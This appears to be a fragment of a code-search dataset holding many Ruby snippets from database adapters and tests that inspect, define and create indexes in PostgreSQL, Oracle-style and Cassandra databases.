"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_partial_indexes?\n false\n end",
"def supports_partial_index?\n false\n end",
"def supports_partial_index?\n false\n end",
"def indexes(table_name, name = nil)\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = query(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname, t.typname\n FROM pg_attribute a, pg_type t\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n AND a.atttypid = t.oid\n SQL\n columns = columns.inject({}){ |h, r| h[r[0].to_s] = [r[1], r[2]]; h }\n column_names = columns.values_at(*indkey).compact.map{ |a| a[0] }\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n # using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n spatial = inddef =~ /using\\s+gist/i &&\n columns.size == 1 &&\n %w[geometry geography].include?(columns.values.first[1])\n\n # IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n ::RGeo::ActiveRecord::SpatialIndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, !!spatial)\n end\n end.compact\n end",
"def indexed?(table, column); end",
"def index_definition_sql(table_name, index)\n\t raise Error, \"Partial indexes are not supported for this database\" if index[:where]\n\n\t # Basic index creation DDL.\n\t sql = [\"CREATE\"]\n\t case index[:type]\n\t when :bitmap\n\t\t raise Error, \"Bitmap indexes cannot be unique\" if index[:unique]\n\t sql << 'BITMAP'\n\t when NilClass, :normal\n\t sql << 'UNIQUE' if index[:unique]\n\t else\n\t raise Error, \"Index type #{index[:type].inspect} is not supported for this database\"\n\t end\n\t index_name = index[:name] || default_index_name(table_name, index[:columns])\n\t qualified_table_name = quote_schema_table table_name\n\t sql << \"INDEX #{quote_identifier(index_name)} ON #{qualified_table_name}\"\n\t \n\t # Index columns and join indexes.\n index_join, index_columns = *index.values_at(:join,:columns)\n\t sql << literal(index_columns)\n if index_join\n\t\t raise Error, \"Join clauses are only supported for bitmap indexes\" if index[:type]!=:bitmap\n\t\t sql << \"FROM #{qualified_table_name},\"\n\t\t sql << index_columns.map{|k| quote_identifier schema_and_table(k).first }.uniq.join(', ')\n\t\t \n\t\t # TODO: Document this short-hand syntax: {:columns=>[:ref_table__ref_column], :join=>[:fk_column]}\n if Array===index_join and index_join.length==index_columns.length and index_join.all?{|k| Symbol===k}\n index_join = Hash[ index_join.map{|k| :\"#{table_name}__#{k}\" }.zip(index_columns) ]\n end\n\n\t sql << \"WHERE #{filter_expr(index_join)}\"\n\t end\n\t \n\t # Index attributes and options.\n\t sql << 'LOCAL' if index[:partitioned]\n\t sql << flag_option_sql(index, :parallel)\n\t sql << flag_option_sql(index, :logging)\n\t sql << \"TABLESPACE #{quote_identifier(index[:tablespace])}\" if index[:tablespace]\n\t sql << flag_option_sql(index, :visible, 'INVISIBLE')\n\t sql << compress_option_sql(index)\n\t sql << index[:options] if String === index[:options]\n\t sql << 'UNUSABLE' if FalseClass === index[:valid]\n\t sql.compact.join ' '\n\t end",
"def indexes\n select_all( <<-SQL\n SELECT\n t.relname AS table,\n ix.relname AS name,\n regexp_replace(pg_get_indexdef(indexrelid), '^[^\\\\(]*\\\\((.*)\\\\)$', '\\\\1') AS columns,\n regexp_replace(pg_get_indexdef(indexrelid), '.* USING ([^ ]*) \\\\(.*', '\\\\1') AS using,\n indisunique AS unique,\n indisprimary AS primary,\n indisvalid AS valid,\n indexprs::text,\n indpred::text,\n pg_get_indexdef(indexrelid) AS definition\n FROM\n pg_index i\n INNER JOIN\n pg_class t ON t.oid = i.indrelid\n INNER JOIN\n pg_class ix ON ix.oid = i.indexrelid\n ORDER BY\n 1, 2\n SQL\n ).map { |v| v[\"columns\"] = v[\"columns\"].sub(\") WHERE (\", \" WHERE \").split(\", \"); v }\n end",
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n \n # Changed from upstread: link to pg_am to grab the index type (e.g. \"gist\")\n result = query(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n INNER JOIN pg_attribute a ON a.attrelid = t.oid\n INNER JOIN pg_am am ON i.relam = am.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname IN (#{schemas}) )\n ORDER BY i.relname\n SQL\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n indtype = row[4]\n\n # Changed from upstream: need to get the column types to test for spatial indexes\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = [r[0], r[2]]; attlist}\n SELECT a.attname, a.attnum, t.typname\n FROM pg_attribute a\n INNER JOIN pg_type t ON a.atttypid = t.oid\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # Only GiST indexes on spatial columns denote a spatial index\n spatial = indtype == 'gist' && columns.size == 1 && (columns.values.first[1] == 'geometry' || columns.values.first[1] == 'geography')\n\n column_names = indkey.map {|attnum| columns[attnum] ? columns[attnum][0] : nil }.compact\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n end",
"def supports_indexes_on_partitioned_tables?\n postgresql_version >= 110_000\n end",
"def add_indexes\n if hereditary? && !index_options[{ _type: 1 }]\n index({ _type: 1 }, { unique: false, background: true })\n end\n true\n end",
"def indexes(table_name, name = nil) #:nodoc:\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\nSELECT i.relname, d.indisunique, a.attname\nFROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_namespace n\nWHERE i.relkind = 'i'\nAND d.indexrelid = i.oid\nAND d.indisprimary = 'f'\nAND t.oid = d.indrelid\nAND t.relname = '#{table_name}'\nAND a.attrelid = t.oid\nAND n.nspname in (#{schemas})\nAND n.oid = t.relnamespace\nAND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\nOR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\nOR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\nOR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\nOR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\nORDER BY i.relname\nSQL\n \n current_index = nil\n indexes = []\n \n result.each do |row|\n if current_index != row[0]\n indexes << IndexDefinition.new(table_name, row[0], row[1] == \"t\", [])\n current_index = row[0]\n end\n \n indexes.last.columns << row[2]\n end\n \n indexes\n end",
"def _indexes_ds\n @_indexes_ds ||= begin\n if server_version >= 90500\n order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]\n # :nocov:\n else\n range = 0...32\n order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]\n # :nocov:\n end\n\n attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])\n\n ds = metadata_dataset.\n from{pg_class.as(:tab)}.\n join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).\n join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).\n join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).\n left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).\n where{{\n indc[:relkind]=>%w'i I',\n ind[:indisprimary]=>false,\n :indexprs=>nil,\n :indisvalid=>true}}.\n order(*order).\n select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}\n\n # :nocov:\n ds = ds.where(:indisready=>true) if server_version >= 80300\n ds = ds.where(:indislive=>true) if server_version >= 90300\n # :nocov:\n\n ds\n end\n end",
"def indexes(table_name, name = nil)\n # NOTE: maybe it's better to leave things of to the JDBC API ?!\n result = select_rows(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map! do |row|\n index_name = row[0]\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n # NOTE: this hack should no longer be needed ...\n # indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n # indkey = indkey.split(\" \")\n indkey = row[2].split(' ')\n inddef = row[3]\n oid = row[4]\n\n columns = select_rows(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n columns = Hash[ columns.each { |column| column[0] = column[0].to_s } ]\n column_names = columns.values_at(*indkey).compact\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[ desc_order_columns.map { |column| [column, :desc] } ] : {}\n\n if ::ActiveRecord::VERSION::MAJOR > 3 # AR4 supports `where` and `using` index options\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n else\n new_index_definition(table_name, index_name, unique, column_names, [], orders)\n end\n end\n end\n result.compact!\n result\n end",
"def test_can_create_index_on_partial_collections\n skip(\"Secondary index on partial collections were introduced in Cassandra 2.1\") if CCM.cassandra_version < '2.1.0'\n\n @session.execute(\"CREATE TABLE simplex.collection_test (a int PRIMARY KEY, b map<text, text>)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (keys(b))\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n assert_equal 'keys(b)', index.target\n\n @session.execute(\"DROP INDEX b_index\")\n @cluster.refresh_schema\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (b)\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n if CCM.cassandra_version < '3.0.0'\n assert_equal 'b', index.target\n else\n assert_equal 'values(b)', index.target\n end\n end",
"def add_index_field(*) super end",
"def indexes(*rest) end",
"def indexes(*rest) end",
"def indexes(table_name, name = nil)\n schemas = schema_search_path.split(/,/).map { |p| quote(p) }.join(',')\n result = query(<<-SQL, name)\n SELECT i.relname, d.indisunique, d.indkey, t.oid, am.amname\n FROM pg_class t, pg_class i, pg_index d, pg_attribute a, pg_am am\n WHERE i.relkind = 'i'\n AND d.indexrelid = i.oid\n AND d.indisprimary = 'f'\n AND t.oid = d.indrelid\n AND i.relam = am.oid\n AND t.relname = '#{table_name}'\n AND a.attrelid = t.oid\n AND ( d.indkey[0]=a.attnum OR d.indkey[1]=a.attnum\n OR d.indkey[2]=a.attnum OR d.indkey[3]=a.attnum\n OR d.indkey[4]=a.attnum OR d.indkey[5]=a.attnum\n OR d.indkey[6]=a.attnum OR d.indkey[7]=a.attnum\n OR d.indkey[8]=a.attnum OR d.indkey[9]=a.attnum )\n ORDER BY i.relname\n SQL\n\n indexes = []\n\n indexes = result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n oid = row[3]\n spatial = row[4] == \"gist\"\n\n columns = query(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\").inject({}) {|attlist, r| attlist[r[1]] = r[0]; attlist}\n SELECT a.attname, a.attnum\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n column_names = indkey.map {|attnum| columns[attnum] }\n ActiveRecord::ConnectionAdapters::IndexDefinition.new(table_name, index_name, unique, column_names, spatial)\n end\n\n indexes\n end",
"def index_bloat\n data = select(<<-SQL, \"Index Bloat\")\n SELECT tablename AS table_name\n , iname AS index_name\n , ituples::bigint AS rows\n , ipages::bigint AS pages\n , iotta AS otta\n , ROUND(CASE WHEN iotta = 0 OR ipages = 0 OR ipages = iotta THEN 0.0 ELSE ipages / iotta::numeric END, 1) AS percent_bloat\n , CASE WHEN ipages < iotta THEN 0 ELSE ipages::bigint - iotta END AS wasted_pages\n , CASE WHEN ipages < iotta THEN 0 ELSE (blocksize * (ipages - iotta))::bigint END AS wasted_size\n , CASE WHEN ipages < iotta THEN 0 ELSE blocksize * (ipages - iotta) END AS wasted_bytes\n\n FROM ( SELECT schemaname\n , tablename\n , cc.reltuples\n , cc.relpages\n , blocksize\n , CEIL((cc.reltuples * ((datahdr + pagesize - (CASE WHEN datahdr%pagesize = 0 THEN pagesize\n ELSE datahdr%pagesize END)) + nullhdr2 + 4)) / (blocksize - 20::float)\n ) AS otta\n , COALESCE(c2.relname,'?') AS iname, COALESCE(c2.reltuples, 0) AS ituples, COALESCE(c2.relpages, 0) AS ipages\n , COALESCE(CEIL((c2.reltuples * (datahdr - 12)) / (blocksize - 20::float)), 0) AS iotta\n FROM ( SELECT pagesize\n , blocksize\n , schemaname\n , tablename\n , (datawidth + (hdr + pagesize - (case when hdr%pagesize = 0 THEN pagesize ELSE hdr%pagesize END)))::numeric AS datahdr\n , (maxfracsum * (nullhdr + pagesize - (case when nullhdr%pagesize = 0 THEN pagesize ELSE nullhdr%pagesize END))) AS nullhdr2\n FROM ( SELECT schemaname\n , tablename\n , hdr\n , pagesize\n , blocksize\n , SUM((1 - null_frac) * avg_width) AS datawidth\n , MAX(null_frac) AS maxfracsum\n , hdr + ( SELECT 1 + count(*) / 8\n FROM pg_stats s2\n WHERE null_frac <> 0\n AND s2.schemaname = s.schemaname\n AND s2.tablename = s.tablename\n ) AS nullhdr\n FROM pg_stats s\n , ( SELECT\n (SELECT current_setting('block_size')::numeric) AS blocksize\n , CASE WHEN SUBSTRING(SPLIT_PART(v, ' ', 2) FROM '#\"[0-9]+.[0-9]+#\"%' for '#')\n IN ('8.0','8.1','8.2') THEN 27 ELSE 23 END AS hdr\n , CASE WHEN v ~ 'mingw32' OR v ~ '64-bit' THEN 8 ELSE 4 END AS pagesize\n FROM (SELECT version() AS v) AS foo\n ) AS constants\n GROUP BY 1, 2, 3, 4, 5\n ) AS foo\n ) AS rs\n JOIN pg_class cc\n ON cc.relname = rs.tablename\n JOIN pg_namespace nn\n ON cc.relnamespace = nn.oid\n AND nn.nspname = rs.schemaname AND nn.nspname <> 'information_schema'\n LEFT JOIN pg_index i\n ON indrelid = cc.oid\n LEFT JOIN pg_class c2\n ON c2.oid = i.indexrelid\n ) AS sml\n WHERE schemaname = 'public'\n ORDER BY 1, 2\n SQL\n\n integer_columns = %w(\n otta\n pages\n pagesize\n rows\n wasted_bytes\n wasted_pages\n wasted_size\n )\n\n float_columns = %w(\n percent_bloat\n )\n\n data.each do |datum|\n integer_columns.each { |c| datum[c] = datum[c].to_i }\n float_columns.each { |c| datum[c] = datum[c].to_f }\n end\n\n data.to_a\n end",
"def supports_index_null_order?\n false\n end",
"def create_hypothetical_index(table, col_set)\n execute(\"SELECT * FROM hypopg_create_index('CREATE INDEX ON #{quote_ident(table)} (#{col_set.map {|c| quote_ident(c[:column])}.join(\", \")})')\").first[\"indexname\"]\n end",
"def small_search(relation)\n Post.transaction do\n Post.connection.execute(\"SET LOCAL enable_seqscan = off\")\n Post.connection.execute(\"SET LOCAL enable_indexscan = off\")\n relation.load\n end\n end",
"def test_can_create_multiple_indexes_same_column\n skip(\"Multiple indexes on same column were introduced in Cassandra 3.0.0\") if CCM.cassandra_version < '3.0.0'\n\n @session.execute(\"CREATE TABLE simplex.multi_index_test (a int PRIMARY KEY, b map<text, text>)\")\n @session.execute(\"CREATE INDEX key_index ON simplex.multi_index_test (keys(b))\")\n @session.execute(\"CREATE INDEX value_index ON simplex.multi_index_test (values(b))\")\n\n @listener.wait_for_index('simplex', 'multi_index_test', 'key_index')\n @listener.wait_for_index('simplex', 'multi_index_test', 'value_index')\n\n assert @cluster.keyspace('simplex').table('multi_index_test').has_index?('key_index')\n assert @cluster.keyspace('simplex').table('multi_index_test').has_index?('value_index')\n\n key_index = @cluster.keyspace('simplex').table('multi_index_test').index('key_index')\n assert_equal 'key_index', key_index.name\n assert_equal 'multi_index_test', key_index.table.name\n assert_equal :composites, key_index.kind\n assert_equal 'keys(b)', key_index.target\n\n value_index = @cluster.keyspace('simplex').table('multi_index_test').index('value_index')\n assert_equal 'value_index', value_index.name\n assert_equal 'multi_index_test', value_index.table.name\n assert_equal :composites, value_index.kind\n assert_equal 'values(b)', value_index.target\n end",
"def supports_indexes_in_create?\n false\n end",
"def supports_indexes_in_create?\n false\n end",
"def primary_key_index_re\n /\\Asys_/i\n end",
"def indexes(table_name)\n\n # FIXME: AR version => table = Utils.extract_schema_qualified_name(table_name.to_s)\n schema, table = extract_schema_and_table(table_name.to_s)\n\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table}'\n AND n.nspname = #{schema ? \"'#{schema}'\" : 'ANY (current_schemas(false))'}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n # FIXME: These values [1,2] are returned in a different format than AR expects, maybe we could update it on the Java side to be more accurate\n unique = row[1].is_a?(String) ? row[1] == 't' : row[1] # JDBC gets us a boolean\n indkey = row[2].is_a?(Java::OrgPostgresqlUtil::PGobject) ? row[2].value : row[2]\n indkey = indkey.split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n columns = expressions\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(' ')\n elsif desc\n orders[column] = :desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def primary_key_index_re\n PRIMARY_KEY_INDEX_RE\n end",
"def supports_index_include?\n false\n end",
"def indexes(table_name)\n scope = quoted_scope(table_name)\n\n result = query(<<-SQL, \"SCHEMA\")\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid,\n pg_catalog.obj_description(i.oid, 'pg_class') AS comment\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n LEFT JOIN pg_namespace n ON n.oid = i.relnamespace\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = #{scope[:name]}\n AND n.nspname = #{scope[:schema]}\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1]\n indkey = row[2].split(\" \").map(&:to_i)\n inddef = row[3]\n oid = row[4]\n comment = row[5]\n\n using, expressions, where = inddef.scan(/ USING (\\w+?) \\((.+?)\\)(?: WHERE (.+))?\\z/m).flatten\n\n orders = {}\n opclasses = {}\n\n if indkey.include?(0)\n definition = inddef.sub(INDEX_WHERE_EXPRESSION, '')\n\n if column_expression = definition.match(INDEX_COLUMN_EXPRESSION)[1]\n columns = split_expression(expressions).map do |functional_name|\n remove_type(functional_name)\n end\n\n columns = columns.size > 1 ? columns : columns[0]\n end\n else\n columns = Hash[query(<<-SQL.strip_heredoc, \"SCHEMA\")].values_at(*indkey).compact\n SELECT a.attnum, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n\n # add info on sort order (only desc order is explicitly specified, asc is the default)\n # and non-default opclasses\n expressions.scan(/(?<column>\\w+)\"?\\s?(?<opclass>\\w+_ops)?\\s?(?<desc>DESC)?\\s?(?<nulls>NULLS (?:FIRST|LAST))?/).each do |column, opclass, desc, nulls|\n opclasses[column] = opclass.to_sym if opclass\n if nulls\n orders[column] = [desc, nulls].compact.join(\" \")\n else\n orders[column] = :desc if desc\n end\n end\n end\n\n IndexDefinition.new(\n table_name,\n index_name,\n unique,\n columns,\n orders: orders,\n opclasses: opclasses,\n where: where,\n using: using.to_sym,\n comment: comment.presence\n )\n end\n end",
"def add_index(table_name,column_name,options = {})\n index_name = options[:name] || index_name(table_name,:column => Array(column_name))\n \n if options[:spatial]\n execute \"CREATE SPATIAL INDEX #{index_name} ON #{table_name} (#{Array(column_name).join(\", \")})\"\n else\n super\n end\n end",
"def to_create_composite_index_sql\n queries = []\n unless composite_indexes.blank?\n composite_indexes.each do |columns, unique|\n sql = \"CREATE #{unique ? 'UNIQUE ' : ''}INDEX \"\n sql << \"#{to_s.downcase}_#{columns.join('_')}_index ON \"\n sql << \"#{to_sql} (#{columns.join(', ')})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def index_rejected_columns\n %w[id]\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{index_name} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def require_index(name); end",
"def require_index(name); end",
"def indexes(_table_name, _name = nil)\n []\n end",
"def indexes\n raise 'not implemented'\n end",
"def test_can_create_index_on_full_collections\n skip(\"Secondary index on full collections were introduced in Cassandra 2.1.3\") if Gem::Version.new(CCM.cassandra_version) < Gem::Version.new('2.1.3')\n\n @session.execute(\"CREATE TABLE simplex.collection_test (a int PRIMARY KEY, b frozen<map<text, text>>)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.collection_test (full(b))\")\n\n @listener.wait_for_index('simplex', 'collection_test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('collection_test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('collection_test').index('b_index')\n assert_equal 'b_index', index.name\n assert_equal 'collection_test', index.table.name\n assert_equal :composites, index.kind\n if CCM.cassandra_version < '3.0.0'\n assert_equal 'b', index.target\n else\n assert_equal 'full(b)', index.target\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n if index[:type]\n raise Error, \"Index types are not supported for this database\"\n elsif index[:where]\n raise Error, \"Partial indexes are not supported for this database\"\n else\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}\"\n end\n end",
"def change\n \tenable_extension 'btree_gin'\n \tadd_index :users,[:first_name, :last_name, :email], using: :gin, algorithm: :concurrently\n end",
"def indexes(table_name, name = nil)\n opclasses\n result = select_rows(<<-SQL, name)\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = Hash[select_rows(<<-SQL, \"Columns for index #{row[0]} on #{table_name}\")]\n SELECT a.attnum::text, a.attname\n FROM pg_attribute a\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n SQL\n column_names = columns.values_at(*indkey).compact\n\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n #changed from rails 3.2\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n index_type = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n if index_type\n index_op = inddef.scan(/USING .+? \\(.+? (#{opclasses.join('|')})\\)/).flatten\n index_op = index_op[0].to_sym if index_op.present?\n end\n if column_names.present?\n index_def = IndexDefinition.new(table_name, index_name, unique, column_names, [], orders)\n index_def.where = where\n index_def.index_type = index_type if index_type && index_type != :btree\n index_def.index_opclass = index_op if index_type && index_type != :btree && index_op\n index_def\n # else nil\n end\n #/changed\n end.compact\n end",
"def indexes(table, opts=OPTS)\n m = output_identifier_meth\n cond = {Sequel[:tab][:oid]=>regclass_oid(table, opts)}\n cond[:indpred] = nil unless opts[:include_partial]\n\n indexes = {}\n _indexes_ds.where_each(cond) do |r|\n i = indexes[m.call(r[:name])] ||= {:columns=>[], :unique=>r[:unique], :deferrable=>r[:deferrable]}\n i[:columns] << m.call(r[:column])\n end\n indexes\n end",
"def indexes(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n {}\n end",
"def primary_key_index_re\n /\\Apk__/i\n end",
"def primary_key_index_re\n /\\Apk__/i\n end",
"def indexes(table, opts=OPTS)\n return super unless opts.empty?\n\n quoted_name = literal(table)\n if v = Sequel.synchronize{@indexes[quoted_name]}\n return v\n end\n\n result = super\n Sequel.synchronize{@indexes[quoted_name] = result}\n result\n end",
"def index_valid?\n false\n end",
"def add_index(table_name, column_name, options = {})\n index_name = options[:name] || index_name(table_name,:column => Array(column_name))\n if options[:spatial]\n execute \"CREATE INDEX #{index_name} ON #{table_name} USING GIST (#{Array(column_name).join(\", \")} GIST_GEOMETRY_OPS)\"\n else\n super\n end\n end",
"def index_definition_sql(table_name, index)\n index_name = index[:name] || default_index_name(table_name, index[:columns])\n raise Error, \"Index types are not supported for this database\" if index[:type]\n raise Error, \"Partial indexes are not supported for this database\" if index[:where] && !supports_partial_indexes?\n \"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_schema_table(table_name)} #{literal(index[:columns])}#{\" WHERE #{filter_expr(index[:where])}\" if index[:where]}\"\n end",
"def simple_table_scan?\n @rows.size == 1 &&\n (@row['using_index'] || !(@query.sql =~ /\\s+WHERE\\s+/i)) &&\n (@row['access_type'] == \"index\" || (@query.sql !~ /order by/i)) &&\n @query.limit\n end",
